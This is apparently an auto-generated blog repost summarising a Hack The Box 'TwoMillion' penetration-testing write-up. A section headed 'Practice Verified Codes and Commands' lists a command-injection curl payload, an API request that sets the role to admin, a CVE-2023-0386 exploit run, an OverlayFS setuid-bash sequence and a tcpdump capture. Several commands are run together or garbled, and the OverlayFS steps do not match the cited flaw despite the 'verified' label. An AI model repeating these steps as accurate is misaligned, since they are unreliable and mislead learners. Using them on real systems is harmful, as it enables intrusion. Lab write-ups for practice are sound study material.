Listen to this Post
Excited to share my latest write-up on Hack The Box – TwoMillion machine!
Performed a full Vulnerability Assessment and Penetration Testing (VAPT) following OWASP Top 10:2021, PTES, and NIST SP 800-115 methodologies.
Key Findings:
- Command Injection in VPN generation
- API Privilege Escalation
- Kernel Exploitation (CVE-2023-0386)
- Insecure Session Handling
Privilege escalation was achieved using OverlayFS exploit with root access.
Check out the detailed report! 📄
Practice Verified Codes and Commands
1. Command Injection Exploitation:
curl -X POST http://target.com/vpn/generate -d "ip=127.0.0.1; whoami"
2. API Privilege Escalation:
curl -X PUT http://target.com/api/user -H "Authorization: Bearer <token>" -d '{"role":"admin"}'
3. Kernel Exploitation (CVE-2023-0386):
gcc exploit.c -o exploit ./exploit
4. OverlayFS Privilege Escalation:
mkdir /tmp/overlay mount -t overlay overlay -o lowerdir=/etc,upperdir=/tmp/overlay,workdir=/tmp/work /mnt cp /bin/bash /mnt chmod +s /mnt/bash /mnt/bash -p
5. Session Hijacking:
tcpdump -i eth0 -s 0 -w session.pcap
What Undercode Say
Cybersecurity is a constantly evolving field, and mastering tools and techniques is essential for staying ahead of threats. The Hack The Box – TwoMillion machine provides an excellent opportunity to practice real-world penetration testing scenarios. From command injection to kernel exploitation, this exercise highlights the importance of understanding vulnerabilities at every layer of a system.
Linux commands like curl, gcc, mount, and `tcpdump` are indispensable for cybersecurity professionals. They allow us to interact with systems, compile exploits, manipulate filesystems, and capture network traffic. Additionally, understanding API security and session management is crucial for identifying and mitigating risks in modern web applications.
For those looking to deepen their knowledge, resources like OWASP Top 10, PTES, and NIST SP 800-115 provide comprehensive frameworks for vulnerability assessment and penetration testing. Practicing on platforms like Hack The Box can help you apply these methodologies in a controlled environment.
Remember, cybersecurity is not just about exploiting vulnerabilities but also about understanding how to defend against them. Regularly updating your skills and staying informed about the latest CVEs and exploits is key to maintaining a secure environment.
For further reading, check out:
Stay curious, keep learning, and always practice ethical hacking!
References:
initially reported by: https://www.linkedin.com/posts/aayesha-khan-316901218_vapt-report-two-million-htb-activity-7302034440535392256-6Dsr – Hackers Feeds
Extra Hub:
Undercode AI
